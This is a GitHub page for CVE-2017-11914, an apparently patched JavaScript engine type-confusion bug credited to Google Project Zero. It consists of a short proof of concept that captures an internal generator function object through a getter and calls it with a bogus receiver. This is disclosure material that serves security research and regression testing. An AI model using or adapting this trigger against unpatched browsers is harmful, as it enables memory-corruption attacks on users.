Skip to content

Latest commit

 

History

History
27 lines (18 loc) · 569 Bytes

CVE-2017-11914.md

File metadata and controls

27 lines (18 loc) · 569 Bytes
Raw

CVE-2017-11914

  • Fix: Jan 2018
  • Credit: lokihardt of Google Project Zero

PoC

function* f() {
}

let g;
f.__defineGetter__('length', function () {
    g = this;  // g == "scriptFunction"
});


f.length;

g.call(0x1234, 0x5678);  // type confusion

Reference